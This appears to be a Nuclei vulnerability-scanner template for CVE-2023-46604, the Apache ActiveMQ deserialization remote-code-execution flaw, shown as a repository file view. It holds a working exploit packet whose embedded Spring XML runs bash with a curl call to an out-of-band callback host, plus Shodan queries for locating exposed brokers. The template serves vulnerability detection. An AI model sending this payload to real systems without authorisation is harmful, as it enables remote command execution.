nuclei-templates/javascript/cves/2023/CVE-2023-46604.yaml

69 lines
3.4 KiB
YAML
Raw Permalink Normal View History

id: CVE-2023-46604
info:
name: Apache ActiveMQ - Remote Code Execution
author: Ice3man,Mzack9999,pdresearch
severity: critical
description: |
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
2024-02-01 14:26:05 +00:00
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
reference:
- http://www.openwall.com/lists/oss-security/2023/10/27/5
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
- https://github.com/X1r0z/ActiveMQ-RCE
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
- https://paper.seebug.org/3058/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-46604
cwe-id: CWE-502
epss-score: 0.97273
epss-percentile: 0.99837
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: activemq
shodan-query:
- product:"ActiveMQ OpenWire Transport"
- cpe:"cpe:2.3:a:apache:activemq"
- product:"activemq openwire transport"
tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev
variables:
prefix: "1f00000000000000000001010042"
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
final: "{{prefix}}{{classname}}"
javascript:
2024-07-10 12:08:01 +00:00
- pre-condition: |
isPortOpen(Host,Port);
code: |
let m1 = require('nuclei/net');
let m2 = require('nuclei/bytes');
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
2024-03-21 01:57:08 +00:00
let randomvar = '{{randstr}}'.toLowerCase();
var Base64={encode: btoa}
2024-02-01 14:23:02 +00:00
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
packet+=(exploit_xml.length).toString(16)
packet+=(b.WriteString(exploit_xml)).Hex()
conn.SendHex(packet);
resp = conn.RecvString()
2024-02-01 14:26:05 +00:00
randomvar
args:
Host: "{{Host}}"
Port: "61616"
2024-02-01 14:23:02 +00:00
oob: "{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 4a0a00473045022057e01ef1d30cc0a70e849e0c6fe4e8e3fbbec9965b3c00043d531726b6b2f8ca022100818d0bfc74f0746cf459838fd25f78d7b518025f549b30bb5998476e890301a0:922c64590222798bb761d5b6d8e72950